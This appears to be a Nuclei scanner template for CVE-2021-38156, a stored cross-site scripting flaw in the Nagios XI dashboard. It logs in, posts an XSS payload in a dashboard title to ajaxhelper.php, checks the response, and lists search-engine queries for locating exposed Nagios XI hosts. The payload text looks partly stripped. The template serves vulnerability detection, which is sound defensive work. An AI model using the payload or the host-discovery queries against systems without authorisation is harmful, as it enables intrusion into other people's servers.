id: CVE-2021-38156 info: name: Nagios XI < 5.8.6 - Cross-Site Scripting author: ritikchaddha severity: medium description: | In Nagios XI before 5.8.6, XSS exists in the dashboard page (/dashboards/#) when administrative users attempt to edit a dashboard. reference: - https://raxis.com/blog/cve-2021-38156/ - https://nvd.nist.gov/vuln/detail/CVE-2021-38156 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2021-38156 cwe-id: CWE-79 epss-score: 0.07062 epss-percentile: 0.94141 cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:* metadata: max-request: 5 verified: true vendor: nagios product: nagios_xi shodan-query: http.title:"nagios xi" fofa-query: app="nagios-xi" google-query: intitle:"nagios xi" tags: cve,cve2021,nagios,nagiosxi,xss,authenticated http: - raw: - | GET /nagiosxi/login.php HTTP/1.1 Host: {{Hostname}} - | POST /nagiosxi/login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded nsp={{nsp}}&pageopt=login&username={{username}}&password={{password}} - | GET /nagiosxi/index.php HTTP/1.1 Host: {{Hostname}} - | POST /nagiosxi/ajaxhelper.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8 cmd=updatedashboard&id=home&opts=&title=">&background=&transparent=0&submitButton=Submit&nsp={{nsp_auth}} - | GET /nagiosxi/dashboards/manage.php HTTP/1.1 Host: {{Hostname}} host-redirects: true max-redirects: 2 matchers-condition: and matchers: - type: word part: body_5 words: - 'data-title="">' - type: word part: header_5 words: - text/html - type: status status: - 200 extractors: - type: regex name: nsp part: body group: 1 regex: - "name=['\"]nsp['\"] value=['\"](.*)['\"]>" internal: true - type: regex name: nsp_auth part: body group: 1 regex: - "var nsp_str = ['\"](.*)['\"];" internal: true # digest: 4b0a00483046022100c5a7c40e8f131cec5d1faf87ae36dbd498634462b4a8c4962b3e9ed41d1b6970022100c14ec12aa4e9778d34a6a6b512b160424e0906f097df8e6494b9fb12763077e8:922c64590222798bb761d5b6d8e72950